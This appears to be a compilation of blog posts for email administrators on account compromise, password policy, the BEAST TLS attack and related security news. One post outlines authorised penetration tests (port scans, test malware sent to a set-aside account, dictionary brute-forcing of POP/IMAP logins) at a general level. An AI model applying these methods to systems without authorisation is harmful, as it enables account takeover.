This morning I noticed the flashing red light on my Blackberry alerting me to a new message. Since this device is connected to my work email account, I decided to give it a look to see what was so important that it couldn’t wait until Monday.

I was lucky that I did check it. The new message was actually from my personal email account and the contents of the message contained only one link and other people were also sent the same message.

I realized immediately that my personal email account was sending spam. I was upset with this because working with email and security, I write and train others on best practices. Not only this, but I follow them as well. I make sure that:

• I use strong passwords and phrases
• I change my passwords frequently
• I don’t use the same password over and over
• I update my anti-malware software regularly
• I run anti-malware scans regularly (ironically, I had just run a scan the day before)
• I am careful about what sites I visit
• I am careful about clicking links in emails
• I am careful about what I download, even checking the MD5 hashes when available.

However after I realized what had happened I didn’t make the classic mistake of denial that this could happen to me. After all, people much smarter than me have had their systems compromised. Driven by a classic saying in computer security, “The only way to ensure that a computer is 100% secure is to unplug it from everything and seal it up in a box,” I moved ahead with fixing the problem.

Steps taken

When I opened up my personal email account there were over 100 mail delivery subsystem errors and Out of Office replies waiting for me.

At first I thought that my email address had possibly been spoofed. After all, most of the sites I write for include it as a way to contact me so I am sure it comes up quite often when people are mining the Internet for email addresses.

However looking at a few of these messages I noticed that the spam messages were being sent to every address that I had ever sent an email to, not just my contacts. What this said is that:

A) My email address had not been spoofed.

B) It wasn’t malware that was abusing my contact list. This was the result of my account credentials being compromised.

It may appear that the first step anyone should take in this situation is to change the password immediately. Not entirely true.

Most passwords are captured from a keystroke logger installed on your computer. If you go ahead and change your password, you are simply letting the attacker know what your new one is.

Instead, I went ahead and attempted to update all of my anti-malware definitions. Since I had just run a scan the day before, there was nothing to update. The next step was to run all of these scans again.

The three scans from Malwarebytes Anti-Malware, TDSSKiller Antirootkit utility and Ad-Aware all came up clean so I went ahead and changed the password on my account. Even after I changed the password, more delivery error messages came up but looking at the headers, these were delayed as the original message sent from my account occurred between 6:48 AM and 6:54 AM so everything looked clean.

Digging deeper

Once I was sure that everything was cleaned up, curiosity got the better of me and I decided to look a bit deeper into the emails that were being sent out from my address.

To make sure I didn’t infect my computer once again, I created a virtual machine and loaded it up with my three favorite anti-malware tools and ran a scan using each just to ensure the new “computer” was clean.

Then I clicked on the link just to see where it went. Of course, the link was spoofed and redirected to cretep.ru registered out of Russia advertising for an herbal Viagra clone, Viagrow. Of course, by their claims it had been featured in Men’s Health, Maxim, MSN, Esquire and other media outlets.

After closing out the site, I fired up all of the anti-malware software to see what really happened when I visited this site. The first scan found two installations of PUP.FunWebProducts and one installation of Adware.MyWebSearch.

Even as the so-called experts when it comes to email, we have to realize that as threats escalate in sophistication we too are vulnerable. Following the best practices and taking the proper measures to secure our email accounts certainly help, but there is no way that any of us can assume that our accounts are 100% safe.

Yes, My Email Account Was Compromised

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators

How about a quick show of hands? How many of you, reading this, administer a corporate email system? Hmmm, looks like practically all of you, except for that guy in the back of the corner wearing the yellow t-shirt. Okay, not sure why you’re here, but I appreciate you reading nonetheless. Okay, next question. How many of you have a password policy that makes you change your corporate  password every month, for example?

You hear that? That’s the sound of crickets chirping as practically each and every one of you tries to avoid eye contact with everyone else, because most of you probably haven’t changed the password to your personal email account since you first set it up. Now consider how many things are tied to that email account. Password resets for your bank accounts, your credit card accounts, your Facebook, Twitter, and blog accounts; personal email accounts are treasure troves of information for attackers. A compromised personal email account is the perfect information source for an ongoing attack against a user because so many other accounts can be compromised without the victim being aware. And the majority of users will not change their password unless a system prompts them to.

Which is why Google has started a campaign to get users of its popular Gmail service to start changing their password. A new banner will appear at the top of the Gmail web page on accounts with passwords that haven’t been changed in an unspecified, but likely, long time.

The link takes users to a page that offers advice for good password management, including

1. Using a unique password for each unique account.
2. Using a complex password.
3. Advice for creating a password that is difficult to guess.
4. Updating password recover information, and
5. Tips for storing passwords when your memory just isn’t good enough.

And after all, with dozens if not a hundred or more unique accounts, who can keep unique passwords for each and every account in their head?

Google has also led the industry by offering two factor authentication to users at no charge, using SMS messages to their cell phones to provide the second factor, and offers it as an additional way to secure accounts on this same page. Whether you choose to take advantage of this or not, or even whether or not you use Gmail, changing your password for your personal email account is something that is probably long overdue.

They even included a pretty good, very short, video that talks about how to create strong passwords. It lasts less than a minute, is easy for non-techies to follow, and is completely neutral. Here is a link to that video. As soon as you have changed your password, write up a nice little blurb to include in your weekly security tips to your users, reminding them to change the password on their personal accounts too. Remember this bit of security advice my dentist taught me years ago:

“passwords are like toothbrushes; you don’t want to share them with anyone, and you need to change them often.”

Google States What Needs To Be Said

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators

<sarcasm> Okay, sit down, I have some shocking news for you. TLS has been hacked, broken, smashed to bits. The technology that secures almost all of the secure Internet traffic we rely upon daily has been cracked. We’re all doomed, our bank accounts are going to be plundered, and ecommerce will come to an end. We might just as well all return to the trees; we made a good go of it, but society as we know it is done.</sarcasm>

In all seriousness though, the latest blow to the technologies that help to secure significant amounts of traffic on the Internet was delivered this week by Thai Duong and Juliano Rizzo, two security researchers who plan to demonstrate proof of concept code at the Ekoparty Security Conference in Buenos Aires, Argentina, that can actually decrypt TLS 1.0 traffic. It is a proof of concept, not a zero day exploit already developed into a Metasploit plug-in, so there’s no need to panic quite yet.

TLS 1.0 is one of the most commonly used encryption protocols for securing traffic, including HTTPS, SMTP/TLS, and secure versions of POP3 and IMAP. We use it whenever our clients access our email servers using any secure protocol including web mail, and when we send TLS protected mail between our systems and our partners.

Defined in RFC 2246, it was proposed as a replacement for SSL 3.0, which is actually still widely used today. TLS 1.0 is a Cipher-block chaining protocol, where a block of plaintext is XOR’d with the block of ciphertext that precedes it. BEAST uses a type of cryptologic attack called a “known plain-text” attack to figure out the encryption, exploiting a vulnerability in TLS 1.0 that has long been theorized as a problem with the protocol.

TLS 1.1 and 1.2 both exist as successors to TLS 1.0, and neither are vulnerable to this same flaw, but have not been widely implemented in part because the flaw in 1.0 wasn’t real, at least, not until now. Internet Explorer can use both, but they must be enabled. SChannel in Windows 2008 and 2008R2 can use them as well, but again, must be enabled. The easiest way to do this domain wide for Windows users is to use a group policy to enable “System cryptography: Use FIPS compliant algorithms for encryption, hashing, and signing”, but don’t do that just yet. This can have some undesirable effects on a typical PC. Read this KB article and test carefully before making a system-wide change like this, and then keep in mind that Chrome, Firefox, and most other browsers cannot use TLS 1.1 or 1.2 at the time of this writing. Even with Windows software, this setting is advisory only. It enables them to use TLS 1.1 and 1.2, but it doesn’t force them to. Many websites using HTTPS only implement TLS 1.0, and clients will be able to fall back to that.

The duo’s proof of concept application is called BEAST, for Browser Exploit Against SSL/TLS, and apparently does to a very effective job of decrypting authentication cookies used by websites to grant users access to secured content that requires authentication. Apparently the attack works like this: a bit of JavaScript is injected into a user’s browser session when they visit a compromised website or click on a link that takes them to a site set up to deliver the code; it then works with a network sniffer to capture encrypted cookies passed between the client and a server, which it is then able to decrypt.

To exploit a system, an attacker must first deliver the JavaScript to the browser, and then must have a sniffer in place to capture the packets. A well patched system, running current antivirus, and protected by mechanisms like a proxy server, should be difficult to attack. If an attacker can do all of that to a user, they can probably do anything else they want already, which means they probably already own the victim’s computer.

The good news is that the exploit for this vulnerability, and the proof of concept application, were both developed by good guys. By demonstrating that this sort of attack possible and practical, it will likely motivate developers of browsers and web servers to deploy TLS 1.1 and 1.2 capable versions of their software. Google has already released a patch that, while still using TLS 1.0, defeats this particular attack, and the developers of OpenSSL and the Network Security Services libraries used now have real reasons to implement the stronger protocols.

So, what can be done to help mitigate this? Follow the points below:

1. Keep up-to-date on all vendor patches, both for your operating system and all applications you use.
2. Keep antivirus software up-to-date, use real-time scans, and perform scheduled full scans regularly.
3. Close all browser sessions, and use a fresh session with no other open tabs whenever you need to browse to a secure site, like your bank, credit card, webmail, etc.
4. Close that browser completely when you log off.
5. Consider disabling JavaScript in your browser.
6. Consider using a sandboxed version of a browser.
7. Watch for, and implement, updated libraries for encryption as soon as they are available from your vendors.

In researching for this article, I came across a handy website that can show you just which protocols your browser uses to secure an HTTPS session. It uses a self-signed certificate, so be ready to get a warning dialog, but check out https://www.mikestoolbox.net/ to see some interesting information about your browser, and to test any changes you make to supported encryption protocols.

Keep Calm and Carry On

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators

Advanced persistent threats make email security a necessity

Most email administrators consider security to be a large part of what they do. With so many laws and regulations governing the storage, discovery and retrieval of email messages, security has become a second job to many.

Unfortunately, many administrators either forget, or simply aren’t aware, that securing email requires much more effort than hardening the email servers against attack. In order to fully protect your organization’s email and their contents the mailbox also needs to be defended. Especially when you consider how popular Advanced Persistent Threats are becoming with large cyber crime syndicates who use email not only as a way to harvest sensitive information, but also as a method of attack through phishing and social engineering.

By implementing the following tips into your security plan you can help protect against these, and the many other threats that your organization may face:

Create email policies to regulate the communication of confidential information

Email communication has become second nature in the workplace. It is quick, easy and it gives us a record of our conversation so we can refer back to any information at a later date. However, if the conversation contains sensitive information like login credentials, financials, personal information, and the like, then it can be extremely valuable to anyone who may harvest those emails.

By simply setting up, and enforcing, policies that restrict certain information from being sent via email you can mitigate the damage done if emails are exposed. At the very least, your policy should state that user logins and passwords (and/or PINs) not be communicated via email.

Teach users to encrypt their messages

One of the best analogies I have seen to describe the need for encrypting emails is one that compares email to a postcard. Basically, anyone who comes across it can read the contents if they want. This can be stopped by encrypting emails to prevent eavesdropping.

Encryption is a hard thing for many people. It requires additional steps, training and, in some cases, third-party software (such as PGP) yet it is really the only way to keep your messages private in transit.

Encryption shouldn’t be limited to sending and receiving messages alone. Any email that is stored on a hard drive (think personal folders), a network drive, backup servers or archive systems should also be protected from any prying eyes.

Get rid of old email

A long time ago, storage space was a precious resource. Nowadays inboxes can be easily scaled to hold enormous amounts of data. Unfortunately that provides a greater possibility that an attacker will find something valuable.

Email should be moved, or deleted, when their life cycle is up. Make sure to check with any regulations regarding discovery and archiving before getting rid of the old stuff, but if you combine this with encryption you will be taking great strides to protect older emails.

Practice good network security habits

Make sure that desktops are continually scanned for malware that could possibly expose email login credentials, filter Internet content to protect against malicious websites, understand how to properly use a firewall and update server and client software as needed.

In addition to the employing technology to help secure your email systems you should also consider human factors as well. One of the ways that people first discover that their systems have been compromised is by noticing an anomaly. Be on the lookout for log-ins that just don’t seem right whether it be the IP address, the time of day or even the length of time.

This can be one of the most tedious tasks to undertake when it comes to security but it is by far the most important.

Put the right solutions in place

In many small and medium-sized enterprises, the email administrator alone cannot be as vigilant as he or she would like. Even in organizations where there is team of professionals dedicated to security use necessary security tools to help them do their jobs. Smaller companies need to understand this as well.

By employing technologies that help manage email, backup and recovery, archiving and security, you are plugging the little holes that provide that chink in the armor most attackers are looking for.

No one said that email security is going to be an easy task, but it is one that cannot be ignored just because it’s too hard or it costs too much.

Tips for Better Email Security

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators

The recent spike in security breaches resulting from meticulously planned and executed spear phishing attacks may have forced email administrators to start thinking of topics that they may never have considered previously, such as the repercussion of a hacked Exchange Server account, or the reasons why hackers would be interested in attacking your email server.  Indeed, you may have already read Securing Your Microsoft Exchange 2010 Server, and have duly implemented the various hardening measures that I’ve linked to in that article.

Moving ahead though, you may be wondering if your Exchange Server is truly protected against malicious attacks.  Beyond waiting for a hacker to successfully break in, is there anything that the diligent administrator can do to reduce the chances of a successful break in?  I had the opportunity to attend an EC-Council Certified Ethical Hacker course recently, and one indelible lesson I gained would be how proper penetration tests can facilitate better security.  The rationale is simple – if you can break in, then so can hackers.  Today, I want to highlight some very simple penetration testing strategies that cash-strapped businesses can perform on their Exchange Servers to get a better pulse on their security readiness.

Obviously, permission must first be obtained from the relevant management prior to any penetration testing – preferably in writing.  Also, the usual caveat emptor about the dangers of tinkering with malware applies; there is also the very real possibility of Trojans hidden within typical tools used by hackers.  Finally, I would strongly advocate hiring a properly qualified and professional penetration team, which has the added benefit of a detailed report on any findings with recommendations for improvements.

Port scan

One of the simplest ways to establish the presence of malware or illicit server software would be to do a port scan on your Exchange Server.  While simplistic, this is nevertheless one of the first steps that a hacker will perform when targeting your organization, and could potentially reveal flawed configurations or the presence of unwanted (and forgotten) software services.

An extension of this idea would be to scan for the presence of SMTP (Port 25) listeners on your internal network, the presence of which could indicate the presence of unauthorized software or zombie computers running spamming software.  A basic and very well-known network and security scanner would be the free NMap, though many commercial variants exist that are capable of more detailed scans such as detecting common misconfigurations.

Sending malware to yourself

An easy way to test the capability of one’s malware filter or gateway antivirus scanner would be to deliberately send malware to an account on your server.  This may range from executable files, hiding them within archives, or malformed PDF files or Word documents – you essentially employ the same tricks that spammers and hackers are known to use.  Obviously, administrators should take pains to send infected email attachments only to unused accounts or one that has been set aside for the purpose of testing.

It should also be noted  that many of the recent attacks rely more on phishing or social engineering that push users into clicking a link to a malware-laden website as opposed to sending malware as an email attachment.

Brute Force Password Hacking

A brute force password attack entails repeatedly logging into an account with various combinations of passwords, and is a strategy employed by hackers looking for soft targets on the Internet.  Unlike cracking an actual password hash file or database, attempting to break in via brute forcing the password as part of a penetration test is a lower risk proposition, and viable if care is taken not to disrupt the access of legitimate users.

Moreover, this is a good way of weeding out easy-to-guess passwords that may be used by some employees, and is an activity that be conducted when server and network utilization is lower (such as over the weekend or overnight).  Dictionary files in your company’s native language can be compiled relatively easily, or downloaded from various repositories on the Internet.  Finally, there is no need to find a tool dedicated to breaking into Exchange Server either, since any password brute force tool that supports POP or IMAP can be made to work.

Are you aware of any simple penetration testing strategies that can be used to test the robustness of an Exchange Server deployment?  Feel free to highlight them in the comments section below.

Simple Penetration Testing Strategies for Your Exchange Server

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators

In just one week Google, the International Monetary Fund and Citigroup have all made headlines as a result of email associated with them being under attack. The reason we continue to see companies make the news as a result of email attacks is that email security is sometimes ignored when it comes to training users properly and making good decisions. In some cases, having the latest and greatest when it comes to security tools even creates a false sense of security that causes us, and our users, to overlook the little things. A multi-layered defense that has been properly configured with all the best technology can be rendered useless if the little things are forgotten.

This list displays some of the most common mistakes that are made when it comes to email security and a brief description of what you can do to prevent them.

Leaky emails

There are many times when sensitive information is passed along via email. If everything is encrypted properly you, and your users, often assume that it will only be seen by the appropriate people. Unfortunately this isn’t always the case. Too many times a recipient may answer an email with sensitive information and hit the reply all button without checking to see who will be receiving the email.

The fix: Put a policy in place that addresses sensitive emails and reply to emails. However a policy alone isn’t enough. Make users aware of the policy through training and keep a record that all users were trained/informed of the policy and repercussions of not adhering to it.

Trusting others

When we receive emails from family, friends and business colleagues we often blindly open them without much concern. Especially if they are contacts we communicate with on a regular basis. However malware can easily be spread through emails by attachment or embedded code and links.

The fix: HTML in emails should be blocked if this is a concern, as should the ability for your users to receive attachments that are scripts or executable files.

Passwords that are easy to guess

Remember when Sarah Palin’s personal email account was breached? It was because her password was easy to guess using information the attacker found on her Wikipedia page. Companies often list information on corporate sites that provide attackers enough information to guess passwords as well.

The fix: Enforce strong passwords or password phrases for all users. Also, make sure that people don’t give up information that may be used to guess their passwords when providing bios.

Ignoring malware protection on the desktop

While scanning all emails for malware needs to be done, the desktop should not be ignored. And all too often it is. Malware definitions are outdated, software is not configured to run properly or protection is completely left to the user.

Even if you have a policy that enforces strong passwords, a keystroke logger can easily give up even the most complex password combination.

The fix: Email administrators should work closely with IT security to make sure that the desktop and network security isn’t lax so passwords are tougher to expose.

Failing to check on backups

Some companies and industries are required, by law, to back up and archive emails for a set period of time. Others are not required to do so. Regardless of the laws, every person and company should be in the practice of backing up emails. Emails often provide important records and information that could be lost.

But what happens if you need to restore your emails and find that something went wrong? Maybe the backup was incorrectly configured or the backup location was insecure. In any event, the inability to restore emails from a backup can render the entire solution useless.

The fix: Frequently test the ability of your backup solution, and staff, to restore emails.

These five tips may seem basic and simple. But that is the point. Working in IT we often gravitate towards the more complex issues and ignore simple techniques and solutions until it is too late. By taking the time to do the little things when it comes to security, we build an even stronger foundation for all the bells, whistles and technologies that really impress us and our bosses.

5 Simple Mistakes When it Comes to Email Security

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators

Passwords are a necessary evil for system security, but they need not be as evil as some organizations require them to be. Even “trivial” passwords can be secure, if their system-wide use is policed.

That’s the conclusion of a pair of Microsoft researchers and a Harvard computer science professor reached in a paper expected to to be presented at the Hot Topics in Security workshop to be held in Washington, D.C. next month. The trio–Stuart Schechter, Cormac Herley and Prof. Michael Mitzenmacher–maintain that users can be allowed to adopt simple passwords as long as too many of them aren’t allowed to adopt the same password.

“We propose to strengthen user-selected passwords against statistical-guessing attacks by allowing users of Internet-scale systems to choose any password they want–so long as it’s not already too popular with other users,” they write in Popularity Is Everything: A New Approach to Protecting Passwords from Statistical-Guessing Attacks.

One reason organizations impose password creation rules is to protect their users from brute force “dictionary” attacks. If a password can be found in a dictionary, then sooner or later a hacker will crack it. Passwords made up of non-words can foil such attacks. Passwords made up of hellacious combinations of upper- and lowercase letters, numbers and symbols are better yet. The problem for users, though, is that, for most of them, the most secure passwords are the hardest to remember.

Rather than modify user behavior–which is to damn security and choose as simple a password as possible–security pros often deploy a “three strikes and you’re out” lockout system to foil password horde attacks by hackers. With that system, if a password is entered incorrectly three times, the person attempting to log in to the account is locked out of it for a brief period of time. Crackers, who are great students of human behavior, quickly figured out a workaround to lockout schemes. The workaround has to do with how users choose passwords.

In an analysis of some 32 million pilfered passwords performed earlier this year by a security firm, it was discovered that 60 percent of the users chose passwords made from a limited set of alpha-numeric characters. Worse yet, 50 percent of the passwords were names, slang, dictionary words or trivial passwords, such as 123456 or “Password.” Internet grifters are well aware of those tendencies among users. So what they do is rather than trying to direct thousands of attempts at an account to crack its password, they take the most common passwords used by users and direct them at thousands of accounts. Not only does that skirt lock-out defenses, but it’s much more efficient than a brute force dictionary attack.

That kind of common password attack, though, can be blunted by adopting the methods proposed by the authors of Popularity Is Everything. Their system calls for limiting the number of times a particular password can be used. So even if an intruder guesses a correct password, he or she would only be able to compromise a handful of accounts at the most.

“Replacing password creation rules with popularity limits has the potential to increase both security and usability,” the researchers contend in their paper. “Since no passwords are allowed to become too common, attackers are deprived of the popular passwords they require to compromise a significant fraction of accounts using online guessing.”

“We conjecture that usability also increases,” they continue. “System designers no longer need to create increasingly complex password-selection rules with no guarantee that they will result in truly strong passwords. Users needn’t read, learn, or interpret these rules. Instead, users are only inconvenienced when their password choice is one that would lead to a [quantifiable] unacceptable level of vulnerability to a statistical guessing attack.”

Although the password philosophy advocated by the researchers has yet to undergo close scrutiny from the security community, steering users away from common passwords has gained some traction at one of the largest social networks on the Internet.

“Twitter, in responding to an online password guessing attack that exploited their failure to lock out guessers, now forbids 390 of the most common passwords,” the researchers noted. “It would appear that Twitter decided that this inconveniences their users less than the introduction of cumbersome password policies.”

How to choose a password according to Microsoft

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators

Does the security of your company’s WiFi networks keep you awake at night? Would you like to test the strength of the passwords to that network but can’t afford to tie up a computer for days or weeks to do it? Then a new service called WPA Cracker might be for you.

The recently launched pay-as-you-go service is aimed at “penetration testers.” It links some 400 computers in “the cloud” to accomplish in minutes what would take days or weeks for a single desktop or laptop.

Designed to crack WPA or WPA2 passwords when PSK is used, the service uses massive compilations of words to mount dictionary attacks on a wireless network. It will also crack passwords to zip archives.

The main dictionary used by the service contains 135 million English password possibilities tailored to networks protected by WPA or WPA2. In addition, there’s a 284 million word extended dictionary and 100 million digit dictionary. The extended dictionary is not a superset of the standard dictionary. That is, words in the extended dictionary are not found in the standard one. The digit dictionary contains permutations of passwords composed eight-character-long numbers. Each dictionary can be run against a network separately or in aggregate as a mammoth 520 million password resource. A German dictionary is also offered by the service.

Unlike the dictionary approach to WPA cracking, the service’s Zip cracking feature is a brute force attack. It will try every variation of a character set on the maximum length of a password. Attacks on other file types are planned for the future, according to the service’s Web site.

For pricing purposes, the entire cloud cluster can be deployed or a half set of it. The half cluster option, which takes about 40 minutes to run, costs $17. For a full cluster attack, which takes about 20 minutes to run, the cost is $35. Similar assaults  would take an average of five days if run from a single desktop computer, longer if launched from a notebook computer, according to the service.

Zip file attacks range from $34 to $102, depending on character set and password length.

Payments can be made through Amazon payments and must be made whether or not a password is cracked. Of course, the sense of security a network administrator may feel when the service fails to break into his or her wireless network may be worth the price of failure.

There are a number of free alternatives to WPA Cracker. “Rainbow Tables,” for example, abound on the Internet–most notably at the Church of WiFi. Although those tables facilitate password attacks, they’re limited to individual network ESSIDs. Although thousands of tables have been created for the most common ESSIDs, if your network doesn’t have an ESSID for which a corresponding table has been created, then you’re out of luck. What’s more, when WPA encryption is enabled on a network, the ESSID is often changed to something less common than was used out of the box.

Another drawback to free alternatives is that their dictionaries are substantially smaller than the ones used by WPA Cracker. The Openwall Project, for instance, offers a free dictionary of some four million entries in 20 languages–including Afrikaans, Croatian, Czech, Danish, Dutch, English, Finnish, French, German, Hungarian, Italian, Japanese, Latin, Norwegian, Polish, Russian, Spanish, Swahili, Swedish, Turkish, and Yiddish– that can be used with programs like John the Ripper. For $28.25, the Project offers a CD with a larger list with some 40 million entries. It includes word mangling rules to discover passwords where capitalization or digits have been added to words. However, according to WPA Cracker, those dictionaries are better at cracking Unix passwords than they are at discovering WPA passwords. The dictionaries in WPA Cracker, the service maintains, are created with word combinations, phrases, numbers, symbols and elite speech that have been proven to be successful in attacks on WPA watchwords.

“Security is moving into the cloud … so the attacks will follow security into the cloud as well,” WPA Cracker’s creator Moxie Marlinspike told MIT’s Technology Review. “Password cracking is an obvious thing. Normally, it is cost-prohibitive to run CPU-intensive jobs. [With cloud computing] it costs a lot less money than doing it yourself.”

Act like a hacker with WPA Cracker

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators

IT departments often take the time to be proactive (at least if they’re doing their jobs), and educate staff about using complex passwords, changing passwords frequently, avoiding phishing by not clicking on unknown email links and attachments, and all the other standard protections we know to take. But we sometimes forget that amidst all the technical precautions, we must also take physical precautions.

Passwords, PINs, and other sensitive information often comes in printed form before we commit them to memory. It may be in the form of a letter from a bank or a memo from the IT department, or it may even be a password that we wrote down on a piece of paper and stuck in a drawer. What happens to this paper? More often than not, it gets tossed into the waste bin, where it can be easily picked through by an opportunistic identity thief.

A recent survey showed that a surprising 79 percent of all businesses do not destroy sensitive information on paper that is being discarded or recycled. The UK-based survey showed that 64 percent of businesses have a clear policy on handling written documents with sensitive information, and 32 percent of employees admitted to discarding sensitive documents directly into the trash.

The survey, which was conducted as part of National Identity Fraud Prevention Week, says that identity fraud results in over £1.2 billion every year. Forty percent of the companies surveyed said they throw away information on customers, including home addresses, phone numbers, and even photocopies of passports, all of which can be used to perpetrate identity theft. Individuals are as vulnerable as businesses, and the report says that 44 percent of Britons still do not shred documents with sensitive information. And here’s a shocking statistic. The survey showed that half of all households threw away everything a criminal would need to perpetrate identity theft, and that 79 percent of all household waste had at least one item that could help a criminal.

The answer of course, is simple, non-technical and inexpensive. First, put a policy in place that says all documents with any personal information must be destroyed; and second, install paper shredders in convenient locations throughout the office.

Physical protection of passwords and sensitive information

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators

If you still think your web-based email account is safe enough to use for business (or anything else for that matter), take a look at an article in last week’s Washington Post. The story details an account of the “other woman” who engaged the services of a cracker web site called YourHackerz.com to break into her boyfriend’s email and her boyfriend’s wife’s email.

The service is able to quickly deliver a password to a customer, for a surprisingly small fee. And YourHackerz.com isn’t the only one of its kind; there are dozens of similar services on the Internet that advertise their dark services freely. For a hundred bucks, they promise to “crack all major web based emails”, including Yahoo!, Hotmail, AOL and Gmail. The service even provides proof cracking before payment. How’s that for good marketing?

Although the cracker service bureau doesn’t specify their techniques, the Washington Post article speculates that they use a Trojan horse technique, which sends the victim an email with a link to a greeting card or some other innocuous-looking item, which when downloaded, launches a keystroke grabber that captures passwords and then sends them back to the host. It’s quite likely that these types of services use a combination of techniques.

The first thing to do to protect yourself is to realize that yes, there are people who want to read your email. Probably more than you think. And it’s very easy for those people to get access, for a small fee, from one of these cracker services within just two or three days. We all tend to think we’re immune. We think nobody can break in, and what’s worse, we think nobody wants to. Unfortunately, it happens all the time, and when we least expect it. Spying, espionage, and just plain snooping happens every day, both in business and in social life. It may be to steal our bank accounts, or it may just be to gather corporate secrets or personal information. If you think your spouse is cheating on you, how far would you go to confirm it?

Regardless of what motivations people may have to crack your email password, there are things that you can do to protect yourself. First and foremost, don’t use free webmail accounts. These are the easiest to crack by far (as Sarah Palin found out). Next, use complex passwords. This can actually only go so far as a means of protection though—if the cracker has a keystroke grabber, no matter how complex your password is, it can be stolen. Use encrypted email for sensitive messages, and connect to your login screen using a secure session.

Password theft is big business

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators

There’s been some debate in the blogosphere this past week about password masking, ever since blogger and web usability guru Jakob Nielsen suggested that passwords be shown in clear text as opposed to just a series of bullets as they are typed in by the user. Nielsen, the leading expert in web site usability, claims that password masking violates the basic principle of usability.

And Dr. Nielsen has a point. It’s often happened to me–I’m typing in a password. I get interrupted for a moment, and wonder whether I typed in the right character. I look at the screen, but since there is nothing there but a row of bullets, I can’t tell. Typing in passwords into smartphones and other mobile devices is especially vexing, since most people’s fingers just aren’t meant for typing on tiny keyboards, and typos are common. And if your admin has done his/her job right, if you make three typos in a row, you’ll get locked out. Having clear-text feedback in the password box would eliminate a lot of these problems and make for easier login.

A SANS response to Dr. Nielsen brings out a few concerns, while acknowledging the usability issue. The SANS response still brings up the objection of shoulder-surfing or even accidental observation, along with the potential problem of autocomplete web forms prefilling passwords along with other information. There may also be some compliance issues.

From a security perspective, eliminating password masking should be approached with caution, but the real security comes in increased password difficulty, and in encryption, not in the masking itself. SANS recommends going further and implementing two-factor authentication, which both increases security and improves usability. The two-factor approach eliminates the need to memorize passwords, which overcomes a lot of objections; and further serves to eliminate the scenario of shoulder-surfing. That is, even if someone looks over your shoulder and sees your password in clear text, it’s useless to them, since the two-factor system generates a new password for every use.

Should password masking stand?

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators

During the US Presidential election, when Sarah Palin’s Yahoo! email account got hacked, two things became apparent: First, don’t use free public email accounts for business, and second, be careful of the “secret question” password recovery tool. The latter allowed the hacker to gain access to Gov. Palin’s account.

Microsoft released a report this week highlighting just how vulnerable the secret question gambit really is. Sure, password resets take up time, but letting end-users retrieve them on their own this way is just a bad idea. Microsoft’s study, which was reported on in the New Scientist, showed that the secret question is often easily guessed. The study looked at webmail users’ acquaintances, and asked them to try to guess the secret question of the webmail user’s account. The acquaintances guessed right about 20 percent of the time.

But you don’t have to know the person to make a good guess. Social networking sites are typically full of personal tidbits of information. What’s your dog’s name? Chances are, if you’re a dog lover, you’ve posted a few pictures of your pooch here and there, and have mentioned the lovable mutt’s name a couple times on your blog, Twitter, or social networking page. It’s easy to find. What was the name of your high school? That’s an easy one to discover. Ever hear of Classmates.com?

The Microsoft study recommends an alternative to the secret question, which involves a user selecting multiple individuals to act as trustees; if the user gets locked out, they ask the trustees to download a recovery code. The user collects the recovery codes, and then can gain access to the account. 

Microsoft study shows ‘secret question’ password recovery is weak

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators

No matter how email users may complain, friendly reminders regarding email security protecting company information assets are part of the ongoing education process.  Email users quickly forget that the company owns the information within each email account. The email system is owned by the company, not the email user. This also implies that it’s up to each person to ensure that their email account is always secure. People lazily create passwords that are familiar and easy to hack.

Email administrators are the gate keepers to ensure email accounts are kept secure.  Sometimes this requires setting up secure procedures, which appear to be an inconvenience to the end user community. So forcing 8 character passwords, instead 6 character passwords can make all the difference.  The inconvenience is minimal compared to thwarting password dictionary attacks or brute force attacks.

Raising the security wall also calls for insisting people use pass phrases, rather than passwords.  Choosing a simple password typically makes a dictionary attack easier for the account hacker.  People take the path of least resistance by selecting names of pets, kids, spouses, birthdays, house address or basically something that ends up being an extremely poor password choice.

The success of a dictionary attack is improving because hackers are smartly using large dictionaries and combining them with foreign language dictionaries. The addition of technical dictionaries increases the chance of hitting on the correct password.  Another way dictionary attacks are successful is variations in manipulating word strings within each dictionary.  For example, a hacker will spell dictionary words backward and forward.

Considerations to Minimize Brute Force Attacks

• Force people to enter a longer length password or phrase (8 to 10 characters)
• Allowing the pass phrase to contain characters other than numbers, such as *,  # or $
• Lock the account after 5 failed login attempts

A brute force attack will always succeed, eventually. The deciding factor with brute force attacks will be systems with sufficiently longer pass phrase combinations, which could require years to complete.

Raising the Security Wall Higher

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators

An unrepentant, arrogant loser with too much time on his hands hacked into the Phpbb.com web site, published thousands of user passwords, and then took the time to boast about it online. The script kiddie justifies his actions by noting that he did not alter any files on the server, and that he did what he did out of boredom. His excuses are lame, but we won’t dwell on that. What’s newsworthy is that the passwords he stole and subsequently published were so simple. Loser that he may be, we still owe him a debt of gratitude for showing us this. Yes, it seems there are still people out there who use “123456″ as a password.

After the attack, security expert Robert Graham, writing on Dark Reading, took the time to look at the list of published passwords and analyze them looking for patterns, and he came up with what he calls “interesting” results. “Startling” might be a more appropriate adjective.

First of all, the passwords on the site were allowed to be very simple, not even requiring both numbers and letters. According to the writer’s analysis, there was a 65 percent match running the passwords through a standard dictionary file, and a 94 percent match for hacker dictionaries. According to Robert’s results, 16 percent of the passwords matched a person’s first name, 14 percent were keyboard patterns, 4 percent were variations of the word “password”, 5 percent had pop-culture references, 4 percent referenced nearby things, 3 percent were emo words, 3 percent were “don’t care” words, 1.3 percent were passwords seen on television or in the movies, and 1 percent were sports related. The most popular password was “123456″, with 3.03 percent of users choosing this one. 2.13 percent chose the word “password” as their password.

Hacked web site shows password vulnerability

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators

We still wonder how people managed to hack into our email accounts–but a recent survey gives us the answer. Is your email password “Spot”? How about “Rover”? Oh, you’re a cat lover? Okay, then I guess “Fluffy.”

